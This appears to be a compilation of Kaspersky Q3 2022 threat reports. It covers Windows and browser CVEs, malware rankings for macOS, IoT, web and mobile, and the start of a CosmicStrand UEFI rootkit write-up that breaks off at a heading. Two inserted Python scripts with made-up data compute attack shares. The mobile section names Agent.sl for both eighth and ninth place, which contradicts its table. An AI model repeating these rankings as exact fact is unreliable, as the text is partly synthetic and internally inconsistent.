Q3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let’s begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: CVE-2022-30220, along with CVE-2022-35803 and CVE-2022-37969, both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: CVE-2022-22022, CVE-2022-30206, and CVE-2022-30226. These allow elevating the system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation (CVE-2022-22047, CVE-2022-22049, and CVE-2022-22026), while CVE-2022-22038 affects the remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including CVE-2022-22034 and CVE-2022-35750, which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require that an exploit already be running on the system before an attacker can use it to launch their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, CVE-2022-34713 and CVE-2022-35743, which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system.

Most of the network threats detected in Q3 2022 were again attacks associated with brute-forcing passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. The attempts at exploiting network services and other software via vulnerabilities in the Log4j library (CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, and CVE-2021-45105) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are CVE-2022-22028, which can lead to leakage of confidential information, as well as CVE-2022-22029, CVE-2022-22039 and CVE-2022-34715, which a cybercriminal can use to remotely execute arbitrary code in the system — in kernel context — by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability CVE-2022-34718, which allows in theory to remotely exploit a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the CVE-2022-34724 vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.

Two vulnerabilities in Microsoft Exchange Server, CVE-2022-41040 and CVE-2022-41082, received considerable media coverage. They were collectively dubbed “ProxyNotShell” in reference to the ProxyShell vulnerabilities, which have a similar exploitation technique and were closed earlier. Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to extort money from the victim, etc.

Vulnerability statistics

In Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections — 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:

  • CVE-2018-0802 and CVE-2017-11882, in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;
  • CVE-2017-0199, which allows downloading and running malicious script files;
  • CVE-2022-30190, also known as “Follina”, which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;
  • CVE-2021-40444, which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.

Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 (download)

These were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:

  • CVE-2022-2294, in the WebRTC component, which leads to buffer overflow;
  • CVE-2022-2624, which exploits a memory overflow error in the PDF viewing component;
  • CVE-2022-2295, a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;
  • CVE-2022-3075, an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.

Since many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine.

A series of vulnerabilities were identified in Microsoft Edge. Worth noting is CVE-2022-33649, which allows running an application in the system by circumventing the browser protections; CVE-2022-33636 and CVE-2022-35796, Race Condition vulnerabilities that ultimately allow a sandbox escape; and CVE-2022-38012, which exploits an application memory corruption error, with similar results.

The Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: CVE-2022-38476, a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities CVE-2022-38477 and CVE-2022-38478, which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.

The remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.

Attacks on macOS

The third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. In particular, researchers found Operation In(ter)ception, a campaign operated by the North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.

CloudMensis, a spy program written in Objective-C, used cloud storage services as C&C servers and shared several characteristics with the RokRAT Windows malware operated by ScarCruft.

The creators of XCSSET adapted their toolset to macOS Monterey and migrated from Python 2 to Python 3.

In Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake VPN application and fake Salesforce updates, both built on the Sliver framework.

In addition to this, researchers announced a new multi-platform find: the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.

TOP 20 threats for macOS

     Verdict                            %*
  1  AdWare.OSX.Amc.e                   14.77
  2  AdWare.OSX.Pirrit.ac               10.45
  3  AdWare.OSX.Agent.ai                9.40
  4  Monitor.OSX.HistGrabber.b          7.15
  5  AdWare.OSX.Pirrit.j                7.10
  6  AdWare.OSX.Bnodlero.at             6.09
  7  AdWare.OSX.Bnodlero.ax             5.95
  8  Trojan-Downloader.OSX.Shlayer.a    5.71
  9  AdWare.OSX.Pirrit.ae               5.27
 10  Trojan-Downloader.OSX.Agent.h      3.87
 11  AdWare.OSX.Bnodlero.bg             3.46
 12  AdWare.OSX.Pirrit.o                3.32
 13  AdWare.OSX.Agent.u                 3.13
 14  AdWare.OSX.Agent.gen               2.90
 15  AdWare.OSX.Pirrit.aa               2.85
 16  Backdoor.OSX.Twenbc.e              2.85
 17  AdWare.OSX.Ketin.h                 2.82
 18  AdWare.OSX.Pirrit.gen              2.69
 19  Trojan-Downloader.OSX.Lador.a      2.52
 20  Downloader.OSX.InstallCore.ak      2.28

* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked.

As usual, our TOP 20 ranking of the biggest threats encountered by users of Kaspersky security solutions for macOS was dominated by adware. AdWare.OSX.Amc.e, touted as “Advanced Mac Cleaner,” took the top place for a second quarter in a row. This application displays fake system issue messages, offering to buy the full version to fix those. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.

Geography of threats for macOS

TOP 10 countries and territories by share of attacked users

     Country or territory*   %**
  1  France                  1.71
  2  Canada                  1.70
  3  Russia                  1.57
  4  India                   1.53
  5  United States           1.52
  6  Spain                   1.48
  7  Australia               1.36
  8  Italy                   1.35
  9  Mexico                  1.27
 10  United Kingdom          1.24

* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000).
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

France, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.

IoT attacks

IoT threat statistics

In Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.

Telnet   75.92%
SSH      24.08%

Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022

A majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.

Telnet   97.53%
SSH      2.47%

Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022
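The two distributions above measure different things: the first counts each attacking device once per service, the second counts every login session, so a few very active Telnet sources push the session share far above the device share. The following script, an added example written for this report rather than Kaspersky's own tooling, computes both views from a constructed honeypot log (the log format, IP addresses and counts are all made up for illustration) and skips malformed lines and untracked ports instead of aborting.

```python
import re
from collections import Counter

# Constructed honeypot log, one line per login session (not real Kaspersky data).
# Assumed line format: "<timestamp> <source_ip> <destination_port>".
RAW_LOG = """\
2022-07-01T00:00:01Z 203.0.113.5 23
2022-07-01T00:00:07Z 203.0.113.5 23
2022-07-01T00:01:12Z 203.0.113.5 23
2022-07-01T00:02:30Z 203.0.113.5 23
2022-07-01T00:03:44Z 203.0.113.5 23
2022-07-01T00:05:00Z 198.51.100.7 23
2022-07-01T00:05:09Z 198.51.100.7 23
2022-07-01T00:06:21Z 198.51.100.9 23
2022-07-01T00:07:02Z 192.0.2.20 22
2022-07-01T00:08:15Z 192.0.2.21 22
2022-07-01T00:09:00Z 192.0.2.22 80
garbage line that does not parse
"""

# Only the two services the honeypot tracks; anything else is ignored.
PORT_TO_SERVICE = {23: "telnet", 22: "ssh"}
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s*$")


def parse_sessions(raw):
    """Return a list of (source_ip, service) tuples, one per session.
    Lines that do not parse, or that target a port the honeypot does not
    track, are skipped rather than failing the whole run."""
    sessions = []
    for line in raw.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        service = PORT_TO_SERVICE.get(int(m.group("port")))
        if service is None:
            continue
        sessions.append((m.group("ip"), service))
    return sessions


def _percentages(counter):
    """Turn raw counts into percentages rounded to two decimals."""
    total = sum(counter.values())
    if total == 0:
        return {}
    return {svc: round(100.0 * n / total, 2) for svc, n in counter.items()}


def share_by_sessions(sessions):
    """Share of each service by number of sessions (the 'working sessions' view)."""
    return _percentages(Counter(service for _, service in sessions))


def share_by_unique_ips(sessions):
    """Share of each service by number of distinct attacking IP addresses.
    A source that attacks both services is counted once for each service;
    that is an assumption made for this example, not the page's definition."""
    distinct = {(ip, service) for ip, service in sessions}
    return _percentages(Counter(service for _, service in distinct))


if __name__ == "__main__":
    sessions = parse_sessions(RAW_LOG)
    print("by unique IPs:", share_by_unique_ips(sessions))
    print("by sessions:  ", share_by_sessions(sessions))
```

With the constructed log, three Telnet sources and two SSH sources give a 60/40 split by device, while the same data gives 80/20 by session because one Telnet source opened five sessions. That gap is the same effect the two tables above show, only smaller.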

TOP 10 threats delivered to IoT devices via Telnet

     Verdict                              %*
  1  Backdoor.Linux.Mirai.b               28.67
  2  Trojan-Downloader.Linux.NyaDrop.b    18.63
  3  Backdoor.Linux.Mirai.ba              11.63
  4  Backdoor.Linux.Mirai.cw              10.94
  5  Backdoor.Linux.Gafgyt.a              3.69
  6  Backdoor.Linux.Mirai.ew              3.49
  7  Trojan-Downloader.Shell.Agent.p      2.56
  8  Backdoor.Linux.Gafgyt.bj             1.63
  9  Backdoor.Linux.Mirai.et              1.17
 10  Backdoor.Linux.Mirai.ek              1.08

* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats.

Detailed IoT-threat statistics are published in the DDoS report for Q3 2022.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums.

Countries and territories that serve as sources of web-based attacks: TOP 10

The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted.

In Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.

Distribution of web-attack sources by country and territory, Q3 2022

Countries and territories where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.

Note that these rankings only include attacks by malicious objects that fall under the Malware class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

Country or territory*  %**
1  Taiwan  19.65
2  Belarus  17.01
3  Serbia  15.05
4  Russia  14.12
5  Algeria  14.01
6  Turkey  13.82
7  Tunisia  13.31
8  Bangladesh  13.30
9  Moldova  13.22
10  Palestine  12.61
11  Yemen  12.58
12  Ukraine  12.25
13  Libya  12.23
14  Sri Lanka  11.97
15  Kyrgyzstan  11.69
16  Estonia  11.65
17  Hong Kong  11.52
18  Nepal  11.52
19  Syria  11.39
20  Lithuania  11.33

* Excluded are countries and territories with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

On average during the quarter, 9.08% of internet users’ computers worldwide were subjected to at least one Malware-class web attack.

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

In Q3 2022, our File Anti-Virus detected 49,275,253 malicious and potentially unwanted objects.

Countries and territories where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

These rankings only include attacks by malicious programs that fall under the Malware class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country or territory*  %**
1  Turkmenistan  46.48
2  Yemen  45.12
3  Afghanistan  44.18
4  Cuba  40.48
5  Tajikistan  39.17
6  Bangladesh  37.06
7  Uzbekistan  37.00
8  Ethiopia  36.96
9  South Sudan  36.89
10  Myanmar  36.64
11  Syria  34.82
12  Benin  34.56
13  Burundi  33.91
14  Tanzania  33.05
15  Rwanda  33.03
16  Chad  33.01
17  Venezuela  32.79
18  Cameroon  32.30
19  Sudan  31.93
20  Malawi  31.88

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

On average worldwide, Malware-class local threats were registered on 14.74% of users’ computers at least once during Q3. Russia scored 16.60% in this ranking.
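The two rankings above (web and local infection risk) are built the same way: count the unique users in a country on whose machines a Malware-class detection fired, divide by all unique users there, and drop countries with too few users. The script below is an added example that reproduces that method on constructed telemetry records; it is not Kaspersky's code, and the record format, the user-count threshold and the sample data are assumptions.

```python
"""Per-country 'share of users attacked' ranking from telemetry events.

Added example reproducing the report's methodology: unique users with a
Malware-class detection / all unique users in the country, countries with
fewer than min_users excluded. Record layout and sample data are constructed.
"""
from collections import defaultdict

# Verdict classes the report leaves out of Malware-class rankings.
NON_MALWARE_CLASSES = {"RiskTool", "AdWare"}


def verdict_class(verdict: str) -> str:
    """Class prefix of a verdict, e.g. 'Trojan-Spy' for 'Trojan-Spy.AndroidOS.Agent.aas'.
    'not-a-virus:AdWare.Win32.Foo' style names carry the class after the colon."""
    name = verdict.split(":", 1)[-1]
    return name.split(".", 1)[0]


def is_malware_class(verdict: str) -> bool:
    """True for detections that count toward the ranking (no riskware/adware)."""
    if verdict.startswith("not-a-virus:"):
        return False
    return verdict_class(verdict) not in NON_MALWARE_CLASSES


def rank_countries(events, min_users=10_000):
    """events: iterable of (country, user_id, verdict_or_None).
    A None verdict means the user reported telemetry but had no detection.
    Returns [(country, share_percent)] sorted by share, highest first."""
    all_users = defaultdict(set)
    attacked = defaultdict(set)
    for country, user, verdict in events:
        all_users[country].add(user)          # set: a user counts once
        if verdict is not None and is_malware_class(verdict):
            attacked[country].add(user)       # repeated detections still count once
    rows = []
    for country, users in all_users.items():
        if len(users) < min_users:            # too few users for a stable share
            continue
        share = 100.0 * len(attacked[country]) / len(users)
        rows.append((country, round(share, 2)))
    rows.sort(key=lambda row: (-row[1], row[0]))
    return rows


def make_events():
    """Constructed sample telemetry (hypothetical countries A, B, C)."""
    events = []
    # A: 12,000 users; 2,000 with a Trojan (reported twice), 500 with adware only.
    events += [("A", f"A-{i}", None) for i in range(12_000)]
    events += [("A", f"A-{i}", "Trojan.Win32.Generic") for i in range(2_000)] * 2
    events += [("A", f"A-{i}", "not-a-virus:AdWare.Win32.Foo") for i in range(2_000, 2_500)]
    # B: 20,000 users; 5,000 with a backdoor detection.
    events += [("B", f"B-{i}", None) for i in range(20_000)]
    events += [("B", f"B-{i}", "Backdoor.Win32.Generic") for i in range(5_000)]
    # C: 500 users, all attacked, but below the inclusion threshold.
    events += [("C", f"C-{i}", "Trojan.Win32.Generic") for i in range(500)]
    return events


if __name__ == "__main__":
    for country, share in rank_countries(make_events()):
        print(f"{country}: {share}%")
```

The adware-only users in country A are deliberately excluded, matching the footnote that RiskTool and adware detections do not count, and country C disappears entirely because it is under the threshold even though every one of its users was attacked.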

IT threat evolution in Q3 2022. Mobile statistics

18 November, 2022 - 09:05

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q3 2022:

  • A total of 5,623,670 mobile malware, adware, and riskware attacks were blocked.
  • Droppers (Trojan-Dropper), accounting for 26.28% of detections, were the most common threat to mobile devices.
  • 438,035 malicious installation packages were detected, of which:
    • 35,060 packages were related to mobile banking Trojans,
    • 2,310 packages were mobile ransomware Trojans.

Quarterly highlights

Judging by the number of attacks on mobile devices, cybercriminal activity stabilized in Q3 2022 after a gradual drop in the previous quarters. Over the three months, Kaspersky products prevented a total of 5.6 million mobile malware, adware, and riskware attacks.

Number of attacks targeting users of Kaspersky mobile solutions, Q1 2021 to Q3 2022

The new Triada Trojan, discovered inside a modified WhatsApp build, was an interesting find. It was notable for spreading via ads inside the popular Snaptube app and through the Vidmate internal store. Once on a device, the Trojan decrypts and runs a payload, which downloads and runs further malicious modules. The modules can display ads, subscribe the user to paid services, or download and run other malicious modules. Besides that, the Trojan steals various keys from the legitimate WhatsApp, potentially hijacking the account.

The Harly Trojan subscribers were another malware family spread via legitimate channels. These are published in Google Play under the guise of authentic apps, subscribing the unknowing user to paid services once installed. We have discovered 200 malicious applications of this type starting in 2020, and a total count of installations at the time of writing this report had exceeded 5 million.

One of the most recently detected Harly-type apps in Google Play, with more than 50,000 installations.

Google Play keeps getting new banking Trojans, such as new versions of the Trojan dropper that downloads and runs Sharkbot.

Despite a general decline in the number of mobile attacks, we can see that cybercriminals are using increasingly smarter tricks to deliver malware to user devices.

Mobile threat statistics

In Q3 2022, Kaspersky detected 438,035 malicious installation packages, which is 32,351 more than in the previous quarter and down 238,155 against Q3 2021.

Number of detected malicious installation packages, Q3 2021 to Q3 2022

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type, Q2 and Q3 2022

Threats in the Trojan-Dropper class ranked first among all threats detected in Q3, with 26.28%, exceeding the previous quarter’s figure by 22.15 percentage points. Nearly half (45.33%) of all detected threats of that type belonged to the Ingopack family. These were followed by banking Trojan droppers from Wroba (41.24%) and Hqwar families (5.98%).

AdWare, the ex-leader, moved 2.5 percentage points down the rankings to second place with a share of 22.78%. A fourth of all detected threats of that class belonged to the Aldo family (25.64%).

Third place was taken by various Trojans with a cumulative share of 16.01%, which was 4.48 percentage points lower than in the previous quarter. Half of all detected threats of that class were objects from the Boogr family (50.16%).

Top 20 mobile malware programs

Note that the malware rankings below exclude riskware or PUAs, such as RiskTool or adware.

Verdict  %*
1  DangerousObject.Multi.Generic  22.58
2  Trojan.AndroidOS.Generic  14.59
3  Trojan-Spy.AndroidOS.Agent.aas  8.51
4  Trojan-SMS.AndroidOS.Fakeapp.d  6.95
5  Trojan.AndroidOS.GriftHorse.l  5.57
6  Trojan-Dropper.AndroidOS.Hqwar.hd  2.94
7  DangerousObject.AndroidOS.GenericML  2.90
8  Trojan-Dropper.AndroidOS.Wroba.o  2.46
9  Trojan-Dropper.AndroidOS.Agent.sl  2.21
10  Trojan-Downloader.AndroidOS.Necro.d  1.93
11  Trojan-Dropper.AndroidOS.Agent.rv  1.84
12  Trojan-Banker.AndroidOS.Bian.h  1.71
13  Trojan-Downloader.AndroidOS.Agent.kx  1.69
14  Trojan-Dropper.AndroidOS.Hqwar.hc  1.66
15  Trojan.AndroidOS.Hiddad.hh  1.52
16  Trojan.AndroidOS.GriftHorse.ah  1.45
17  Trojan-SMS.AndroidOS.Agent.ado  1.41
18  Trojan-Dropper.AndroidOS.Hqwar.gen  1.39
19  Trojan-Dropper.AndroidOS.Triada.az  1.35
20  Trojan.AndroidOS.Soceng.f  1.33

* Unique users attacked by this malware as a percentage of all attacked users of Kaspersky mobile solutions.

First and second places went to DangerousObject.Multi.Generic (22.58%) and Trojan.AndroidOS.Generic (14.59%), respectively, which are verdicts we use for malware detected with cloud technology. Cloud technologies are used when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is essentially how the latest malware types are detected.

Trojan-Spy.AndroidOS.Agent.aas (8.51%), an evil twin of WhatsApp with a spy module built in, rose to third position. Trojan-SMS.AndroidOS.Fakeapp.d slid from second to fourth place with 6.95%. This malware is capable of sending text messages and calling predefined numbers, displaying ads and hiding its icon. Members of the Trojan.AndroidOS.GriftHorse family, which subscribe the user to premium SMS services, took fifth and sixteenth places.

Malware from the Trojan-Dropper.AndroidOS.Hqwar family, used for unpacking and running various banking Trojans, occupied sixth, fourteenth, and eighteenth places. These attacked a combined 6% of all users who encountered malware.

The verdict of DangerousObject.AndroidOS.GenericML came seventh with 2.90%. This verdict is assigned to files recognized as malicious by our machine-learning systems. Eighth place was occupied by Trojan-Dropper.AndroidOS.Agent.sl (2.46%), a dropper that unpacks and runs the banking Trojan from the Roaming Mantis campaign. Roaming Mantis mainly attacks users in Japan and France. Another banking Trojan dropper, Trojan-Dropper.AndroidOS.Agent.sl, sunk to ninth place with 2.21%.

Trojan-Downloader.AndroidOS.Necro.d, used for downloading and running other forms of malware on infected devices, jumped from sixteenth to tenth place with 1.93%. Trojan-Dropper.AndroidOS.Agent.rv, a dropper that unpacks and runs various types of malware, took eleventh place with 1.84%.

Twelfth place saw the arrival of the banking Trojan Trojan-Banker.AndroidOS.Bian.h, with 1.71%. Trojan-Downloader.AndroidOS.Agent.kx, an adware dropper accounting for 1.69%, climbed from twentieth to thirteenth place. Trojan.AndroidOS.Hiddad.hh, an adware Trojan that mostly attacks users in Russia, Kazakhstan, and Ukraine, was fifteenth with 1.52%.

Trojan-SMS.AndroidOS.Agent.ado, known for sending text messages to premium-rate shortcodes, remained seventeenth with 1.41%. Nineteenth place, with 1.35%, was occupied by Trojan-Dropper.AndroidOS.Triada.az, a type of malware that decrypts and runs a payload capable of displaying ads on the lock screen, opening new browser tabs, gathering device information, and dropping other malicious code.

The last in the rankings (previously thirteenth) is Trojan.AndroidOS.Soceng.f with 1.33%. It sends text messages to the user’s contacts, deletes files on the memory card, and overlays the interfaces of popular apps with its own window.

Geography of mobile threats

TOP 10 countries and territories by share of users attacked by mobile malware

Countries and territories*  %**
1  Iran  81.37
2  Yemen  18.91
3  Saudi Arabia  12.68
4  Oman  11.99
5  Algeria  11.93
6  Kenya  11.42
7  Nigeria  10.72
8  India  10.65
9  Egypt  9.39
10  Ecuador  8.66

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 10,000) have been excluded from the rankings.
** Unique users attacked as a percentage of all users of Kaspersky mobile security solutions in the country.

The countries with the largest shares of attacked users and the most widespread threats in these regions remained unchanged in Q3 2022.

Iran came first with a record 81.37%, still plagued by the annoying adware modules from the AdWare.AndroidOS.Notifyer and AdWare.AndroidOS.Fyben families. Yemen, where users were attacked mostly by Trojan-Spy.AndroidOS.Agent.aas, stayed at second place with 18.91%. In Saudi Arabia, which came third with 12.68%, users most commonly encountered adware from the AdWare.AndroidOS.Adlo and AdWare.AndroidOS.Fyben families.

Mobile banking Trojans

The number of detected installation packages for mobile banking Trojans dropped to 35,060. This figure represents a decrease of 20,554 from Q2 2022 and a decrease of 22,963 from Q3 2021.

Two-thirds (66.20%) of the detected banking Trojan installation packages belonged to the Trojan-Banker.AndroidOS.Bray family. These were followed by Trojan-Banker.AndroidOS.Bian with 5.46% and Trojan-Banker.AndroidOS.Fakecalls with 4.59%.

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2021 to Q3 2022

Top 10 most common mobile bankers

Verdict  %*
1  Trojan-Banker.AndroidOS.Bian.h  29.61
2  Trojan-Banker.AndroidOS.Anubis.t  10.67
3  Trojan-Banker.AndroidOS.Svpeng.q  7.72
4  Trojan-Banker.AndroidOS.Gustuff.d  5.35
5  Trojan-Banker.AndroidOS.Asacub.ce  4.18
6  Trojan-Banker.AndroidOS.Agent.eq  3.94
7  Trojan-Banker.AndroidOS.Agent.ep  3.21
8  Trojan-Banker.AndroidOS.Agent.cf  2.51
9  Trojan-Banker.AndroidOS.Faketoken.z  2.12
10  Trojan-Banker.AndroidOS.Hqwar.t  2.08

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

The three most-attacked countries in terms of affected users remained the same as in Q2 2022.

Geography of mobile bankers

TOP 10 countries and territories by shares of users attacked by mobile banking Trojans

Countries and territories*  %**
1  Saudi Arabia  1.36
2  Spain  1.05
3  Australia  0.79
4  Turkey  0.41
5  Switzerland  0.20
6  Japan  0.11
7  France  0.08
8  Colombia  0.08
9  South Korea  0.07
10  Italy  0.04

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 10,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Saudi Arabia had the largest share (1.36%) of unique users who came across mobile financial threats in Q3 2022. Trojan-Banker.AndroidOS.Bian.h accounted for more than 99% of attacks in that country. Spain, formerly the hardest-hit country, had the second largest share (1.05%), with 93.46% of attacks linked to the same malware type. Australia again had the third-largest (0.79%) share, with 98.27% of attacks there involving Trojan-Banker.AndroidOS.Gustuff.d.

Mobile ransomware Trojans

We detected 2,310 mobile Trojan ransomware installers in Q3 2022, a decrease of 1,511 from Q2 2022 and a decrease of 3,847 year on year.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky, Q3 2021 to Q3 2022

Top 10 most common mobile ransomware

Verdict  %*
1  Trojan-Ransom.AndroidOS.Pigetrl.a  58.73
2  Trojan-Ransom.AndroidOS.Small.as  4.52
3  Trojan-Ransom.AndroidOS.Rkor.cw  4.17
4  Trojan-Ransom.AndroidOS.Rkor.cl  1.92
5  Trojan-Ransom.AndroidOS.Fusob.h  1.92
6  Trojan-Ransom.AndroidOS.Rkor.cm  1.60
7  Trojan-Ransom.AndroidOS.Rkor.da  1.60
8  Trojan-Ransom.AndroidOS.Rkor.bi  1.60
9  Trojan-Ransom.AndroidOS.Rkor.cx  1.57
10  Trojan-Ransom.AndroidOS.Small.ce  1.32

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

Geography of mobile ransomware

TOP 10 countries and territories by share of users attacked by mobile ransomware Trojans

Countries and territories*  %**
1  Yemen  0.28
2  Kazakhstan  0.15
3  Saudi Arabia  0.02
4  Jordan  0.02
5  Switzerland  0.02
6  Azerbaijan  0.01
7  Kyrgyzstan  0.01
8  Egypt  0.01
9  Iran  0.01
10  Algeria  0.01

* Excluded from the rankings are countries and territories with relatively few (under 10,000) Kaspersky mobile security users.
** Unique users attacked by ransomware Trojans as a percentage of all Kaspersky mobile security solution users in the country or territory.

Yemen (0.28%), Kazakhstan (0.15%) and Saudi Arabia (0.02%) had the largest shares of users attacked by mobile ransomware Trojans. Users in Yemen and Saudi Arabia most often encountered Trojan-Ransom.AndroidOS.Pigetrl.a, while users in Kazakhstan were attacked mainly by members of the Trojan-Ransom.AndroidOS.Rkor family.

IT threat evolution Q3 2022

18 November, 2022 - 09:00

Targeted attacks

CosmicStrand: discovery of a sophisticated UEFI rootkit

In July, we reported a rootkit that we found in modified Unified Extensible Firmware Interface (UEFI) firmware, the code that loads and initiates the boot process when the computer is turned on. Rootkits are malware implants that are installed deep in the operating system. Difficult to detect, they ensure that a computer remains infected even if someone reinstalls the operating system or replaces the hard drive. However, they aren’t easy to create: the slightest programming error could crash the machine. Nevertheless, in our APT predictions for 2022, we noted that more attackers would reach the sophistication level required to develop such tools.

The main purpose of CosmicStrand is to download a malicious program at startup, which then performs the tasks set by the attackers. Having successfully passed through all stages of the boot process, the rootkit eventually runs a shell code and contacts the attackers’ C2 (Command-and-Control) server, from which it receives a malicious payload.

We were unable to intercept the file received by the rootkit from the C2 server. However, on one of the infected machines, we found malware that we think is probably related to CosmicStrand. This malware creates a user named “aaaabbbb” in the operating system with local administrator rights.

We identified targets of CosmicStrand, which we attribute to an unknown Chinese-speaking threat actor, in China, Vietnam, Iran and Russia. All of them were ordinary people using our free antivirus solution, seemingly unconnected with any organization of interest to a sophisticated attacker of this kind. It also turned out that the motherboards infected in all known cases came from just two manufacturers. Therefore, it’s likely that the attackers found some common vulnerability in these motherboards that made UEFI infection possible.

It’s also unclear how the attackers managed to deliver the malware. It’s possible that the attackers are able to infect UEFI remotely. Or that those infected had purchased a modified motherboard from a reseller.

Andariel deploys DTrack and Maui ransomware

